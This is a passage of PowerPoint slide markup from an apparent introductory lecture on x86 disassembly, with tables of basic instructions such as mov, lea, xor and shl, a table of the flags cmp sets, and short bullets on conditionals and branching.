            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="471"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Simple instructions</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="743040" indent="-107640">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="561"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="472" name="Table 3"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="179640" y="1772640"/>
          <a:ext cx="4392000" cy="4305600"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2232000"/>
                <a:gridCol w="2160000"/>
              </a:tblGrid>
              <a:tr h="375120">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="ffffff"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>Instruction</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nSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="ffffff"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>Description</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416520">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="2200" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                        </a:rPr>
                        <a:t>mov eax, ebx</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="2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741240">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="2200" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                        </a:rPr>
                        <a:t>mov eax, 0x40</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="2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r h="741240">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="2200" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                        </a:rPr>
                        <a:t>mov eax, [0x4037c4]</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="2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741240">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="2200" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                        </a:rPr>
                        <a:t>mov eax, [ebx]</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="2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r h="741240">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="2200" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                        </a:rPr>
                        <a:t>mov eax, [ebx+esi*4]</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="2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741240">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="2200" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                        </a:rPr>
                        <a:t>lea eax, [ebx+8]</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="2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r h="416520">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="2200" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                        </a:rPr>
                        <a:t>sub eax, 0x10</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="2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416520">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="2200" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                        </a:rPr>
                        <a:t>add eax, ebx</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="2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bl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="473" name="Table 4"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4644000" y="1772640"/>
          <a:ext cx="4247640" cy="4640760"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1584000"/>
                <a:gridCol w="2663640"/>
              </a:tblGrid>
              <a:tr h="737280">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="ffffff"/>
                          </a:solidFill>
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                        </a:rPr>
                        <a:t>Instruction</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nSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="ffffff"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>Description</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451800">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="2200" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                        </a:rPr>
                        <a:t>inc edx</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="2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451800">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="2200" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                        </a:rPr>
                        <a:t>dec ecx</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="2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r h="451800">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="2200" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                        </a:rPr>
                        <a:t>mul 0x50</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="2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451800">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="2200" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                        </a:rPr>
                        <a:t>div 0x75</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="2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r h="741240">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="2200" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                        </a:rPr>
                        <a:t>xor eax, eax</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="2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451800">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="2200" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                        </a:rPr>
                        <a:t>shl eax, 2</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="2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r h="451800">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="2200" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                        </a:rPr>
                        <a:t>ror</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="2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451440">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="2200" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                        </a:rPr>
                        <a:t>nop</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="2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bl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>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X86 Disassembly</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="475"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Conditionals</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>: instructions that perform the comparison, i.e. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>test</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>cmp</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1143000" indent="-228240">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="479"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Uses with flags ZF, CF, …</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" indent="-75960">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="479"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="476" name="Table 3"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1259640" y="3645000"/>
          <a:ext cx="6095520" cy="1854000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2031840"/>
                <a:gridCol w="2031840"/>
                <a:gridCol w="2031840"/>
              </a:tblGrid>
              <a:tr h="357120">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="ffffff"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>cmp</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nSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="ffffff"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                        </a:rPr>
                        <a:t>ZF</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nSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="ffffff"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>CF</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446760">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                        </a:rPr>
                        <a:t>Dst = src</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="2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noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>1</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noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>0</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446760">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                        </a:rPr>
                        <a:t>Dst &lt; src</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="2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noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>0</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noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>1</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r h="446760">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                        </a:rPr>
                        <a:t>Dst &gt; src</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="2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noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>0</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noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>0</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3477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bl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="477" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3496680" y="2709000"/>
            <a:ext cx="1397880" cy="155412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2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>cmp dst, src</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>test dst, src</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X86 Disassembly</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="479"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Branching</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>: a sequence of code that is conditionally executed depending on the flow of the program, i.e. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>jmp </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>and many versions</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
